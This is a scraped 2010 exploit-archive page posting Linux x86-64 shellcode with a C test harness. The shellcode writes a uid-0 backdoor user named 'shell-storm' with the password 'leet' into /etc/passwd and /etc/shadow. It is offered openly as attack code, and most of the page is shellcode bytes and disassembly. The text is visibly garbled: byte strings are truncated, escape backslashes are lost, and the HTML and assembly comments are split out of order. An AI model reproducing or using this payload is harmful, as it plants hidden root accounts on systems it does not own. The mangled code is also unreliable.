linux/x86-64 - Add root user with password - 390 bytes

Posted on 20 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML linux/x86-64 - Add root user with password - =====================================================

/* Title:  Linux/x86-64 - Add root user with password Date:   2010-06-20 Tested: Archlinux x86_64 k2.6.33

Author: Jonathan Salwan Web:    http://shell-storm.org | http://twitter.com/s

! Dtabase of shellcodes http://www.shell-storm.org/sh

Add root user with password: - User: shell-storm - Pass: leet - id  : 0 */

#include &lt;stdio.h&gt;

char *SC = /* open(&quot;/etc/passwd&quot;,

&quot;x48xbbxffxffxffxffxffx73x77x64&quot; &quot;x48xc1xebx28&quot; &quot;x53&quot; &quot;x48xbbx2fx65x74x63x &quot;x53&quot; &quot;x48x89xe7&quot; &quot;x66xbex41x04&quot; &quot;x66xbax84x02&quot; &quot;x48x31xc0&quot; &quot;xb0x02&quot; &quot;x0fx05&quot;

/* write(3, &quot;shell-s

&quot;x48xbfxffxffxffxffx &quot;x48xc1xefx38&quot; &quot;x48xbbxffxffx2fx62x &quot;x48xc1xebx10&quot; &quot;x53&quot; &quot;x48xbbx67x3ax2fx3ax &quot;x53&quot; &quot;x48xbbx73x74x6fx72x &quot;x53&quot; &quot;x48xbbx30x3ax73x68x &quot;x53&quot; &quot;x48xbbx6fx72x6dx3ax &quot;x53&quot; &quot;x48xbbx73x68x65x6cx &quot;x53&quot; &quot;x48x89xe6&quot; &quot;x48xbaxffxffxffxffx &quot;x48xc1xeax38&quot; &quot;x48x31xc0&quot; &quot;xb0x01&quot; &quot;x0fx05&quot;

/* close(3) */

&quot;x48xbfxffxffxffxffx &quot;x48xc1xefx38&quot; &quot;x48x31xc0&quot; &quot;xb0x03&quot; &quot;x0fx05&quot;

/* Xor */

&quot;x48x31xdb&quot; &quot;x48x31xff&quot; &quot;x48x31xf6&quot; &quot;x48x31xd2&quot;

/* open(&quot;/etc/shadow&quot;,

&quot;x48xbbxffxffxffxffx &quot;x48xc1xebx28&quot; &quot;x53&quot; &quot;x48xbbx2fx65x74x63x &quot;x53&quot; &quot;x48x89xe7&quot; &quot;x66xbex41x04&quot; &quot;x66xbax84x02&quot; &quot;x48x31xc0&quot; &quot;xb0x02&quot; &quot;x0fx05&quot;

/* write(3, &quot;shell-s

&quot;x48xbfxffxffxffxffx &quot;x48xc1xefx38&quot; &quot;x48xbbxffxffxffxffx &quot;x48xc1xebx28&quot; &quot;x53&quot; &quot;x48xbbx34x37x37x38x &quot;x53&quot; &quot;x48xbbx5ax30x55x33x &quot;x53&quot; &quot;x48xbbx73x2fx50x64x &quot;x53&quot; &quot;x48xbbx61x78x65x4dx &quot;x53&quot; &quot;x48xbbx65x57x45x37x &quot;x53&quot; &quot;x48xbbx6fx72x6dx3ax &quot;x53&quot; &quot;x48xbbx73x68x65x6cx &quot;x53&quot; &quot;x48x89xe6&quot; &quot;x48xbaxffxffxffxffx &quot;x48xc1xeax38&quot; &quot;x48x31xc0&quot; &quot;xb0x01&quot; &quot;x0fx05&quot;

/* close(3) */

&quot;x48xbfxffxffxffxffx &quot;x48xc1xefx38&quot; &quot;x48x31xc0&quot; &quot;xb0x03&quot; &quot;x0fx05&quot;

/* _exit(0) */

&quot;x48x31xff&quot; &quot;x48x31xc0&quot; &quot;xb0x3c&quot; &quot;x0fx05&quot;;

int main(void) { fprintf(stdout,&quot;Length: %d &quot;,strlen(SC)); (*(void(*)()) SC)(); return 0; }

# <a href='http://inj3ct0r.com/'>Inj3

4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86-64 - Add root user with password - 390 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================== 390 bytes = - 390 bytes hell_storm ellcode/ O_WRONLY|O_CREAT|O_APPEND, 01204) */ /* mov    $0x647773ffffffffff,%rbx */ /* shr    $0x28,%rbx */ /* push   %rbx */ 2fx70x61x73&quot;       /* mov    $0x7361702f6374652f,%rbx */ /* push   %rbx */ /* mov    %rsp,%rdi */ /* mov    $0x441,%si */ /* mov    $0x284,%dx */ /* xor    %rax,%rax */ /* mov    $0x2,%al */ /* syscall */ torm:x:0:0:shell-storm.or&quot;..., 46) */ ffxffxffx03&quot;       /* mov    $0x3ffffffffffffff,%rdi */ /* shr    $0x38,%rdi */ 61x73x68x0a&quot;       /* mov    $0xa687361622fffff,%rbx */ /* shr    $0x10,%rbx */ /* push   %rbx */ 2fx62x69x6e&quot;       /* mov    $0x6e69622f3a2f3a67,%rbx */ /* push   %rbx */ 6dx2ex6fx72&quot;       /* mov    $0x726f2e6d726f7473,%rbx */ /* push   %rbx */ 65x6cx6cx2d&quot;       /* mov    $0x2d6c6c6568733a30,%rbx */ /* push   %rbx */ 78x3ax30x3a&quot;       /* mov    $0x3a303a783a6d726f,%rbx */ /* push   %rbx */ 6cx2dx73x74&quot;       /* mov    $0x74732d6c6c656873,%rbx */ /* push   %rbx */ /* mov    %rsp,%rsi */ ffxffxffx2e&quot;       /* mov    $0x2effffffffffffff,%rdx */ /* shr    $0x38,%rdx */ /* xor    %rax,%rax */ /* mov    $0x1,%al */ /* syscall */ ffxffxffx03&quot;       /* mov    $0x3ffffffffffffff,%rdi */ /* shr    $0x38,%rdi */ /* xor    %rax,%rax */ /* mov    $0x3,%al */ /* syscall */ /* xor    %rbx,%rbx */ /* xor    %rdi,%rdi */ /* xor    %rsi,%rsi */ /* xor    %rdx,%rdx */ O_WRONLY|O_CREAT|O_APPEND, 01204) */ ffx64x6fx77&quot;       /* mov    $0x776f64ffffffffff,%rbx */ /* shr    $0x28,%rbx */ /* push   %rbx */ 2fx73x68x61&quot;       /* mov    $0x6168732f6374652f,%rbx  */ /* push   %rbx */ /* mov    %rsp,%rdi */ /* mov    $0x441,%si */ /* mov    $0x284,%dx */ /* xor    %rax,%rax */ /* mov    $0x2,%al */ /* syscall * torm:$1$reWE7GM1$axeMg6LT&quot;..., 59) */ ffxffxffx03&quot;       /* mov    $0x3ffffffffffffff,%rdi */ /* shr    $0x38,%rdi */ ffx3ax3ax0a&quot;       /* mov    $0xa3a3affffffffff,%rbx */ /* shr    $0x28,%rbx */ /* push   %rbx */ 3ax3ax3ax3a&quot;       /* mov    $0x3a3a3a3a38373734,%rbx */ /* push   %rbx */ 4dx2fx3ax31&quot;       /* mov    $0x313a2f4d3355305a,%rbx */ /* push   %rbx */ 53x67x63x46&quot;       /* mov    $0x4663675364502f73,%rbx */ /* push   %rbx */ 67x36x4cx54&quot;       /* mov    $0x544c36674d657861,%rbx */ /* push   %rbx */ 47x4dx31x24&quot;   /* mov    $0x24314d4737455765,%rbx */ /* push   %rbx */ 24x31x24x72&quot;       /* mov    $0x722431243a6d726f,%rbx  */ /* push   %rbx */ 6cx2dx73x74&quot;       /* mov    $0x74732d6c6c656873,%rbx */ /* push   %rbx */ /* mov    %rsp,%rsi */ ffxffxffx3b&quot;       /* mov    $0x3bffffffffffffff,%rdx */ /* shr    $0x38,%rdx */ /* xor    %rax,%rax */ /* mov    $0x1,%al */ /* syscall */ ffxffxffx03&quot;       /* mov    $0x3ffffffffffffff,%rdi */ /* shr    $0x38,%rdi */ /* xor    %rax,%rax */ /* mov    $0x3,%al */ /* syscall */ /* xor    %rdi,%rdi */ /* xor    %rax,%rax */ /* mov    $0x3c,%al */ /* syscall */ ct0r.com</a> [2010-06-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20